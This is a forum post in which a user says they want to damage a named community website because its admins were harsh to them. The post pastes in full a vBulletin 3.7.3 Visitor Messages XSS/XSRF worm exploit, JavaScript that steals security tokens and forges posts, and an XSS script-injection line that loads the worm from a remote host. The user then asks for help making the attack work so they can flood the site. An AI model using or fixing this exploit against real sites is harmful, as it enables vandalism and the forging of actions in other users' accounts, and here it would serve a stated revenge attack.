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www.waraxe.us Forum Index -> Newbies corner -> Need help with this vbulletin 3.7.3 exploit please?
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Need help with this vbulletin 3.7.3 exploit please?
PostPosted: Fri Aug 17, 2012 9:56 pm Reply with quote
Joined: Aug 18, 2012
Posts: 1

Hello there is a website I would like to do damage to because the admins have been very harsh on me in the past.

The url is hxxp://www.thedugout.tv/community

I have found this exploit:
vBulletin 3.7.3 Visitor Message XSS/XSRF + worm Exploit

/* -----------------------------
* Author = Mx
* Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
* Software = vBulletin
* Addon = Visitor Messages
* Version = 3.7.3
* Attack = XSS/XSRF

- Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
+ with the visitor messages addon (a clone of a social network wall/comment area).
- When posting XSS, the data is run through htmlentities(); before being displayed
+ to the general public/forum members. However, when posting a new message,
- a new notification is sent to the commentee. The commenter posts a XSS vector such as
+ <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
- under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
+ and I have included an example worm that makes the user post a new thread with your own
- specified subject and message.

* Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which was the first subject
* of the attack method.
* ----------------------------- */

function getNewHttpObject() {
var objType = false;
try {
objType = new ActiveXObject('Msxml2.XMLHTTP');
} catch(e) {
try {
objType = new ActiveXObject('Microsoft.XMLHTTP');
} catch(e) {
objType = new XMLHttpRequest();
return objType;

function getAXAH(url){

var theHttpRequest = getNewHttpObject();
theHttpRequest.onreadystatechange = function() {processAXAH();};
theHttpRequest.open("GET", url);

function processAXAH(){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {

var str = theHttpRequest.responseText;
var secloc = str.indexOf('var SECURITYTOKEN = "');
var sectok = str.substring(21+secloc,secloc+51+21);

var posloc = str.indexOf('posthash" value="');
var postok = str.substring(17+posloc,posloc+32+17);

var subject = 'subject text';
var message = 'message text';

postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5', 'subject=' + subject + '&message=' + message + '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');


function postAXAH(url, params) {
var theHttpRequest = getNewHttpObject();

theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);};
theHttpRequest.open("POST", url);
theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');

function processAXAHr(elementContainer){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {


document.write('<iframe src="http://digitalgangster.com/4um/newthread.php?do=newthread&f=5">');

# 1337day.com [2008-11-20]

I edited it and uploaded it to my webspace here: http://www.baz.s1x.me/worm.js

However when I post a "visitor message" of
<script src"http://www.baz.s1x.me/worm.js"</script>
(without the square CODE tags) it just posts it as text - and I have to delete it quick before anyone sees it.

Can anyone please help me with this exploit? I registered here especially for this after about an hour of Googling for answers.

I REALLY wanna get this to work so I can flood it with threads and make them scared. Laughing

Thanks for any help.
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Need help with this vbulletin 3.7.3 exploit please?
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